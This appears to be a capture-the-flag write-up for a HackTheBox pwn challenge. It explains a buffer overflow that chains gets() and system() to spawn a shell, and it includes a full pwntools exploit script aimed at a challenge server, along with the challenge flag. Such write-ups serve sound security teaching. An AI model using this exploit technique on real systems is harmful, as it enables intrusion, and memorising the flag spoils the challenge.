Pwn - Sound of Silence

Medium

Description

Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!

Downloads

1MB

pwn_sound_of_silence.zip

archive

Solution

Checksec

Firstly, Full RELRO so no GOT overrides and NX enabled which means we can't execute shellcode on the stack.

main()

The program is relatively simple with system() and gets() but no 'win' function. To pwn this we likely need to get the program to execute system('/bin/sh'). There wasn't any gadget that could modify rdi which made the challenge a little tough. (After the event, someone noted that there is the mov rdi, rax gadget in the main function but interestingly, ROPgadget did not pick it up so we could use that if we wanted to.)

The only gadget which is not so useful.

But we don't actually need a ROP gadget. gets() actually stores the user input into rdi which makes this very easy.

Another interesting thing to note is that if we just pass in "/bin/sh" to gets(), the 5th character gets shifted 1 letter downwards.

'/bin/sh' became '/bin.sh'

To overcome this we just need to send "/bin0sh" instead.

from pwn import *

exe = './sound_of_silence'
elf = context.binary = ELF(exe, checksec=False)
# context.log_level = 'debug'

offset = 40

# io = process(exe)
io = remote("94.237.63.93", 59792)

payload = b'A' * offset
payload += p64(elf.plt.gets)
payload += p64(elf.plt.system)

io.sendlineafter(b'>> ', payload)
io.sendline(b'/bin0sh')

io.interactive()

Pwned

Flag: HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}